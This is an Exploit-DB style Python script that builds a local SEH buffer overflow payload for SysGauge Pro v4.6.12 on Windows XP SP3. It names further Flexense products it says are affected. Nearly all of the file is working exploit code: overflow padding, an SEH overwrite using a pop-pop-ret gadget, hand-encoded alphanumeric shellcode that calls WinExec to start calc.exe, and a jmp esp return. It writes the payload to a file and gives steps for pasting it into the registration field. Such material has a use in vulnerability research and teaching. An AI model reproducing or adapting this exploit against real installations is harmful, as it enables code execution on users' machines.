exploit-db-mirror/exploits/windows/local/44455.py

#!/usr/bin/python
##################################################################################################################
# Exploit Title       : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH)                                       #
# Exploit Author      : Hashim Jawad                                                                             #
# Twitter             : @ihack4falafel                                                                           #
# Author Website      : ihack4falafel[.]com                                                                      #
# Vendor Homepage     : http://www.sysgauge.com/                                                                 #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe                             #
# Tested on           : Windows XP Professional - SP3                                                            #
# Steps to reproduce  : ~ Copy content of payload.txt                                                            #
#                       ~ Under Register type in "falafel" in Customer Name field                                #
#                       ~ Paste the content of payload.txt in Unlock Key field and click Register                #
##################################################################################################################

import struct

# ***notes***
# ~ this particular function [Register] of the program only accept characters [00-7f] excluding "\x00\x09\x0a\x0d"
# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean address
# ~ the following are Flexense products effected by the same vulnerability (note buffer size and offsets may vary)
##################################################################################################################
#   ~ SysGauge Ultimate v4.6.12
#   ~ Azure DEX Pro v2.2.16
#   ~ Azure DEX Ultimate v2.2.16
#   ~ DiskBoss Pro v9.1.16
#   ~ DiskBoss Ultimate v9.1.16
#   ~ SyncBreeze Pro v10.7.14
#   ~ SyncBreeze Ultimate v10.7.14
#   ~ DiskPulse Pro v10.7.14
#   ~ DiskPulse Ultimate v10.7.14
#   ~ DiskSavvy Pro v10.7.14
#   ~ DiskSavvy Ultimate v10.7.14
#   ~ DiskSorter Pro v10.7.14
#   ~ DiskSorter Ultimate v10.7.14
#   ~ DupScout Pro v10.7.14
#   ~ DupScout Ultimate v10.7.14
#   ~ VX Search Pro v10.7.14
#   ~ VX Search Ultimate v10.7.14
##################################################################################################################

# overwrite SEH with clean address of [pop, pop, ret]
buffer  = "\x41" * 780                                  # junk to nSEH
buffer += "\x74\x06\x42\x42"                            # nSEH - jump if zero flag is set (always true)
buffer += struct.pack('<L', 0x10013d16)                 # SEH (pop esi # pop ecx # retn  | [libdgg.dll])
buffer += "\x43" * 28                                   # some more junk

# push calc.exe instructions [encoded] into the stack
# Disassembly:
# 0:  33 c0                   xor    eax,eax           # zero out eax register
# 2:  50                      push   eax               # push eax (null-byte) to terminate "calc.exe"
# 3:  68 2E 65 78 65          push   ".exe"            # push the ASCII string to the stack
# 8:  68 63 61 6C 63          push   "calc"            #
# d:  8b c4                   mov    eax,esp           # put the pointer to the ASCII string in eax
# f:  6a 01                   push   0x1               # push uCmdShow parameter to the stack
# 11: 50                      push   eax               # push the pointer to lpCmdLine to the stack
# 12: bb 5d 2b 86 7c          mov    ebx,0x7c862b5d    # move the pointer to WinExec() [located at 0x7c862b5d in kernel32.dll (via arwin.exe) on WinXP SP3] into ebx
# 17: ff d3                   call   ebx               # call WinExec()

# divide calc.exe instructions to 4-byte chunks and pad what's left with nops
# "\x33\xc0\x50\x68"
# "\x2e\x65\x78\x65"
# "\x68\x63\x61\x6C"
# "\x63\x8b\xc4\x6a"
# "\x01\x50\xbb\x5d"
# "\x2b\x86\x7c\xff"
# "\xd3\x90\x90\x90"

# starting from the bottom up in little endian order
# first   push "\x90\x90\x90\xd3"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x90\x90\x90\xd3" into eax and push it to the stack
buffer += "\x05\x72\x70\x70\x70"       ### add eax,0x70707072
buffer += "\x05\x61\x20\x20\x20"       ### add eax,0x20202061
buffer += "\x50"                       ### push eax
##############################################################

# second  push "\xff\x7c\x86\x2b"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\xff\x7c\x86\x2b" into eax and push it to the stack
buffer += "\x05\x01\x32\x35\x66"       ### add eax,0x66353201
buffer += "\x05\x15\x32\x35\x66"       ### add eax,0x66353215
buffer += "\x05\x15\x22\x12\x33"       ### add eax,0x33122215
buffer += "\x50"                       ### push eax
##############################################################

# third   push "\x5d\xbb\x50\x01"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x5d\xbb\x50\x01" into eax and push it to the stack
buffer += "\x05\x01\x30\x65\x36"       ### add eax,0x36653001
buffer += "\x05\x01\x20\x56\x27"       ### add eax,0x27562001
buffer += "\x48"                       ### dec eax
buffer += "\x50"                       ### push eax
##############################################################

# fourth  push "\x6a\xc4\x8b\x63"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x6a\xc4\x8b\x63" into eax and push it to the stack
buffer += "\x05\x32\x46\x70\x35"       ### add eax,0x35544632
buffer += "\x05\x31\x43\x70\x35"       ### add eax,0x35704531
buffer += "\x50"                       ### push eax
##############################################################

# fifth   push "\x6c\x61\x63\x68"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x6c\x61\x63\x68" into eax and push it to the stack
buffer += "\x05\x34\x32\x31\x36"       ### add eax,0x36313234
buffer += "\x05\x34\x31\x30\x36"       ### add eax,0x36303134
buffer += "\x50"                       ### push eax
##############################################################

# sixth   push "\x65\x78\x65\x2e"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x65\x78\x65\x2e" into eax and push it to the stack
buffer += "\x05\x17\x33\x34\x33"       ### add eax,0x33343317
buffer += "\x05\x17\x32\x44\x32"       ### add eax,0x32443217
buffer += "\x50"                       ### push eax
##############################################################

# seventh push "\x68\x50\xc0\x33"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x68\x50\xc0\x33" into eax and push it to the stack
buffer += "\x05\x22\x60\x30\x34"       ### add eax,0x34306022
buffer += "\x05\x11\x60\x20\x34"       ### add eax,0x34206011
buffer += "\x50"                       ### push   eax
##############################################################

# push 20 nops to the stack for padding
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x90\x90\x90\x90" into eax and push it to the stack
buffer += "\x05\x70\x70\x70\x70"       ### add eax,0x70707070
buffer += "\x05\x20\x20\x20\x20"       ### add eax,0x20202020
buffer += "\x50"                       ### push eax
buffer += "\x50"                       ### push eax
buffer += "\x50"                       ### push eax
buffer += "\x50"                       ### push eax
buffer += "\x50"                       ### push eax
##############################################################

# push "jmp esp" address [encoded] to the stack
# 0x6709e053 : "\xff\xe4" | [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, (C:\Program Files\SysGauge Pro\bin\QtCore4.dll)
# 0:  25 10 10 10 10          and    eax,0x10101010
# 5:  25 01 01 01 01          and    eax,0x1010101
# a:  05 31 70 03 34          add    eax,0x34037031
# f:  05 22 70 06 33          add    eax,0x33067022
# 14: 50                      push   eax

buffer += "\x25\x10\x10\x10\x10\x25\x01\x01\x01\x01\x05\x31\x70\x03\x34\x05\x22\x70\x06\x33\x50"

# the program converts "\xff" to "c3" [retn instruction] thus popping previously pushed to the stack address "jmp esp" to eip ;)
buffer += "\xff"
buffer += "C" * (50000-780-4-4-28-21-21-26-22-21-21-21-21-25-1)    ### junk
try:
    f=open("payload.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"